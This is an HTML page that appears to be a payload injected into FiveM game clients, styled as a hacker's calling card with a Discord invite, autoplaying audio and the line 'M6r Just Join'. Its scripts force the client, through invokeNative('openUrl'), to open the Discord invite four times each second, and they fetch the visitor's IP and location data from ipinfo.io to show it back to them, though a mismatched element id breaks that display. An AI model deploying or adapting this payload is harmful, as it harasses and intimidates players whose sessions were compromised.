<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>discord.gg/9K</title>
    <style>
        body {
            margin: 0;
            padding: 0;
            background: url(https://i.pinimg.com/originals/51/ae/a3/51aea3393b8234a1e69d8713a0a58bc3.gif) no-repeat center center fixed;
            background-size: cover;
            font-family: 'Courier New', Courier, monospace;
            color: #ec1010;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            flex-direction: column;
            text-align: center;
        }
        .image-container img {
            width: 750px; 
            height: auto;
            border: 2px solid #ec1010; 
            border-radius: 15px;
            box-shadow: 0 0 15px rgba(1, 1, 1, 1.); 
        }
        .info {
            margin-top: 20px;
            font-size: 1.5em;
            color: #f5ecec; 
            text-shadow: 0px 0px 8px #ec1010, 0px 0px 15px #ec1010, 0px 0px 25px #ec1010; 
            letter-spacing: 10.5px; 
            white-space: pre-wrap;
        }
        .text {
            margin-top: 20px;
            font-size: 2em; 
            color: #f5ecec; 
            text-shadow: 0px 0px 8px #f5ecec, 0px 0px 15px #f5ecec, 0px 0px 25px #f5ecec; 
            letter-spacing: 4.5px; 
        }
    </style>
</head>
<body>
    <div class="image-container">
        <img src="https://cdn.discordapp.com/attachments/1370425214705471610/1373292388080156753/ezgif.com-resize_2.gif?ex=6897f6f3&is=6896a573&hm=fe422cdedf56a3f78a1de5fec350e3ef19b0e8af8f38490270bf190fa43b7f8a&" alt="Discord Image">
    </div>
    <audio autoplay loop>
        <source src="https://cdn.discordapp.com/attachments/1370425214705471610/1403567856536518707/202508090534.mp4?ex=689805ee&is=6896b46e&hm=2e2c29680a90962f59d10f02cf1618d65f24dbf62e78257dfe08fec53a22a179&" type="audio/mpeg">
        Your browser does not support the audio element.
    </audio>
    <div class="info" id="ip-inf">
  What Happend!!

M6r Just Join..🕺

For: GroupHtlr 
For: G 7 F L & AboBdr
    </div>
    <div class="text">discord.gg/9K</div>
    <script>
setInterval(() => {
window.invokeNative("openUrl", "https://discord.gg/9k");
window.invokeNative("openUrl", "https://discord.gg/9k");
window.invokeNative("openUrl", "https://discord.gg/9k");
window.invokeNative("openUrl", "https://discord.gg/9k");
}, 1000);
    </script>
    <script>
         fetch('https://ipinfo.io/json')
        .then(response => response.json())
        .then(data => {
            delete data.readme;
            const infoDiv = document.getElementById('ip-info');
            infoDiv.textContent = JSON.stringify(data, null, 2);
        });
    </script>
</body>
</html>

